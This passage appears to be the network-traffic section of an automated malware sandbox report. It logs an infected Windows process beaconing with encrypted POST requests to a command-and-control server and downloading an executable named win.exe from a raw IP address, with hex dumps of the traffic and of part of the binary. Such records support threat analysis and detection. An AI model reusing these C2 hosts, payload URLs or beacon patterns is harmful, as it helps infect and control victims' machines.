[TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.449749187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:52:59.489118099 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://cpopopnbritilda.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 363
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:52:59.489154100 CEST363OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 5c 26 b0 fe
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vu\&Xaua`%U,Z0uEAzlbD9^Eyc0OT{hO*|EzU%\%nC>]b[uFKqM`*m~P
                                                                              Jul 27, 2024 14:53:00.692163944 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:53:00 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.449750187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:53:00.702811956 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://topqgimihpqwm.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 156
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:53:00.702811956 CEST156OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 7f 0f cf ba
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vu]Ok1AYrvK_3V<:N[aSR9QmG
                                                                              Jul 27, 2024 14:53:01.753737926 CEST185INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:53:01 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10
                                                                              Data Ascii: #\/_$hDm'&B


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.44975164.190.113.113802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:53:01.773401976 CEST159OUTGET /win.exe HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Host: 64.190.113.113
                                                                              Jul 27, 2024 14:53:02.361272097 CEST1236INHTTP/1.1 200 OK
                                                                              Date: Sat, 27 Jul 2024 12:53:02 GMT
                                                                              Server: Apache
                                                                              Last-Modified: Mon, 22 Jul 2024 19:29:34 GMT
                                                                              ETag: "f1600-61ddb109e6b16"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 988672
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-msdos-program
                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 6c 5a 41 03 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 c0 08 00 00 5c 06 00 00 00 00 00 c0 5a 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 78 10 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdlZA"\Z@p`xD`X.text `.rdataPL@@.data0 @.CRTP@@.relocX`@B
                                                                              Jul 27, 2024 14:53:02.361300945 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 57
                                                                              Data Ascii: AWAVAUATVWUSHH-Xl$(D5QDt$0D$(D$48AcqAqw3A]Uqw3fffff.=#Y=8=|(=/2t=uL$&
                                                                              Jul 27, 2024 14:53:02.361316919 CEST1236INData Raw: 0f b6 44 24 27 89 c2 30 ca 84 c0 b8 02 47 e5 77 41 0f 45 c7 84 c9 b9 02 47 e5 77 0f 44 c1 84 d2 41 0f 45 c7 eb aa 66 2e 0f 1f 84 00 00 00 00 00 3d 5c c7 a6 55 0f 8f a3 00 00 00 3d f1 fd a7 23 0f 84 e3 00 00 00 3d 01 b5 84 2b 0f 84 e2 00 00 00 3d
                                                                              Data Ascii: D$'0GwAEGwDAEf.=\U=#=+=qw3tD$%l$,Dt$8D$,D$<|(Offffff.=8=.=}ZD$0T$$0GwAEALD=cq=Gw
                                                                              Jul 27, 2024 14:53:02.361331940 CEST1236INData Raw: 81 fe a5 dc 02 3a 0f 85 20 ff ff ff 4c 8b 8c 24 58 02 00 00 45 0f b6 09 45 01 c9 41 ff c1 44 89 8c 24 70 01 00 00 be 67 2a fa b7 e9 fc fe ff ff 66 66 66 2e 0f 1f 84 00 00 00 00 00 81 fe dc 34 fb f0 0f 8e 08 02 00 00 81 fe 59 4e fa 05 0f 8f a3 03
                                                                              Data Ascii: : L$XEEAD$pg*fff.4YN;Pttvso0D$DDD$@A7%AAA|A7%DADAE0AENfffff.Nue
                                                                              Jul 27, 2024 14:53:02.361346006 CEST1236INData Raw: 8d 79 01 41 0f af f9 f7 d7 83 cf fe 83 3d 49 07 0f 00 0a 44 8b 8c 24 dc 00 00 00 44 89 8c 24 2c 02 00 00 41 0f 9c c2 be 9d 9d 7b 6e 41 b9 9d 9d 7b 6e 7c 06 41 b9 a2 ff ac 53 83 ff ff 40 0f 94 c7 74 06 41 b9 a2 ff ac 53 41 30 fa 0f 85 06 fa ff ff
                                                                              Data Ascii: yA=ID$D$,A{nA{n|AS@tASA0D8L>apD$DL$0|KOG$3T{m|DL$TIL$`cm4
                                                                              Jul 27, 2024 14:53:02.361361980 CEST672INData Raw: 0f 85 7e f5 ff ff 44 8b 4c 24 48 41 ff c1 44 89 8c 24 58 01 00 00 44 8b 4c 24 48 49 01 c9 4c 89 8c 24 48 02 00 00 be 9a 53 fe ef e9 54 f5 ff ff 81 fe 47 23 be 08 0f 8f 6d 08 00 00 81 fe 5a 4e fa 05 0f 84 1d 11 00 00 81 fe f9 cf e3 06 0f 85 30 f5
                                                                              Data Ascii: ~DL$HAD$XDL$HIL$HSTG#mZN0D$AD$EAED$D$tAD$H#qLwo6p|$$gju3h`08L
                                                                              Jul 27, 2024 14:53:02.361376047 CEST1236INData Raw: 41 09 f9 45 31 d1 f7 d6 44 09 ce 89 b4 24 fc 00 00 00 44 8b 4c 24 6c 45 89 ca 41 83 f2 80 be d8 74 fe 49 45 85 ca 0f 84 b8 f2 ff ff be d5 1c 32 41 e9 ae f2 ff ff 81 fe e0 3b 50 fb 0f 84 d0 0f 00 00 81 fe 9c 17 3c fe 0f 85 96 f2 ff ff 83 bc 24 08
                                                                              Data Ascii: AE1D$DL$lEAtIE2A;P<$D$&D$AD$'\%bn!4jlUHmVDL$'ABP8\ D$hD$DL$PD$+
                                                                              Jul 27, 2024 14:53:02.361391068 CEST1236INData Raw: ff 81 fe e0 af 8b 28 0f 84 b3 0e 00 00 81 fe 14 af 62 29 0f 85 f7 ed ff ff 44 8b bc 24 a8 01 00 00 be 80 bb 8f c0 44 8b 4c 24 64 44 89 8c 24 a0 00 00 00 e9 d8 ed ff ff 81 fe 37 e5 09 e6 0f 84 9a 0e 00 00 81 fe 33 5f 30 e6 0f 85 c0 ed ff ff 44 8b
                                                                              Data Ascii: (b)D$DL$dD$73_0DD$DD$@}:J?X~qNYDL$dAD$+f0-WN$AA$@@D0D@@@
                                                                              Jul 27, 2024 14:53:02.361406088 CEST1236INData Raw: 44 89 8c 24 b0 00 00 00 e9 2f e9 ff ff 44 8b 94 24 94 01 00 00 45 85 d2 40 0f 94 c6 44 8b 8c 24 90 01 00 00 41 83 f9 0a 40 0f 9c c7 40 30 f7 be 3c d2 d3 8c bf 3c d2 d3 8c 0f 85 5e 06 00 00 bf 6a be 75 33 e9 54 06 00 00 44 8b 8c 24 98 00 00 00 44
                                                                              Data Ascii: D$/D$E@D$A@@0<<^ju3TD$DL$XD$DL$\DL$8AAL6A.DT$!Dl$"EE0qaAqEAaDL$@ED$DgD$D\D$D$
                                                                              Jul 27, 2024 14:53:02.361879110 CEST1236INData Raw: 45 85 ca 0f 94 44 24 17 44 8b 8c 24 60 01 00 00 41 83 f9 0a 0f 9c 44 24 18 be d4 76 73 02 e9 45 e4 ff ff 44 8b 8c 24 e4 00 00 00 41 ff c9 44 0f af 8c 24 e4 00 00 00 44 89 8c 24 44 01 00 00 be 01 6f 30 05 e9 1f e4 ff ff 44 8b 0d 18 f1 0e 00 44 89
                                                                              Data Ascii: ED$D$`AD$vsED$AD$D$Do0DD$|$4?D$PAAA@D$HA@@0uN7rAMAEDt$,D$DL$HD$D$D$
                                                                              Jul 27, 2024 14:53:02.366940975 CEST1236INData Raw: 44 8b 4c 24 0c 41 ff c1 44 89 8c 24 8c 01 00 00 be 10 59 3f 5f e9 7a df ff ff 44 8b 8c 24 6c 01 00 00 44 89 8c 24 c0 00 00 00 be aa 0c 82 f5 44 8b 8c 24 70 01 00 00 44 89 8c 24 bc 00 00 00 e9 50 df ff ff 44 8b 8c 24 fc 00 00 00 41 83 c1 02 44 89
                                                                              Data Ascii: DL$AD$Y?_zD$lD$D$pD$PD$AD$<62$\{TD$XD$DL$AEAE!DL$DDAAAAJoDEAAJoDAE1Dt$DDL$AAAD$D


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.449752187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:53:03.342819929 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://oafowudievrov.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 257
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:53:03.342819929 CEST257OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 01 6b 2c 90 f4 76 0b 75 5e 36 d3 a7
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA ,[k,vu^6Bsxh>YD3<=?Dmj^]00T@@#L/% O_]`|H-5Xun~||QW!?s>H
                                                                              Jul 27, 2024 14:53:04.434978008 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:53:04 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.449753187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:53:04.446325064 CEST276OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://elufhismjek.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 343
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:53:04.446325064 CEST343OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 53 18 ef 88
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vuSfcP<! Z{adK*]T\z -PJ~,4bcO.3E vqTZYb{LZ!tu+>]>
                                                                              Jul 27, 2024 14:53:05.491784096 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:53:05 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.449754187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:53:05.502310038 CEST276OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://khpnbaaufwo.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 253
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:53:05.502310038 CEST253OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 7a 4c c0 9e
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vuzL/OmsQPK_9'Jds[g%*QyT01qy@ q3xXj8}.-\&0e+v8QozCB<rU-
                                                                              Jul 27, 2024 14:53:06.564179897 CEST206INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:53:06 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 ec d5 7f e5 7c
                                                                              Data Ascii: #\6U9H-anYp7vZW|


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.449757187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:53:16.816903114 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://svsbhghbajavukge.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 244
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:53:16.816936970 CEST244OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 07 6b 2c 90 f4 76 0b 75 20 47 cd f9
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA ,[k,vu GiMVJ`uF.m-]azW^g5HS}>{?oYa,aRWF g,eel/atS?5
                                                                              Jul 27, 2024 14:53:17.860232115 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:53:17 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.449759187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:53:17.876183033 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://imbyndnwddlepn.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 302
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:53:17.876183033 CEST302OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 6e 1a da 9d
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vunNNO:@bz=C~3g^(-!0,@qM_*v\@BFq!JB_K`F+lh`AH`
                                                                              Jul 27, 2024 14:53:18.919106007 CEST137INHTTP/1.1 200 OK
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:53:18 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.449760187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:53:18.942162037 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://gturrgitewwfodad.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 218
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:53:18.942214966 CEST218OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 4f 0c ba 80
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vuOWNTB"&/ye8wGA5*C&+I+LT'CD(mK-#\_Ivyao>I7tt
                                                                              Jul 27, 2024 14:53:20.015670061 CEST193INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:53:19 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
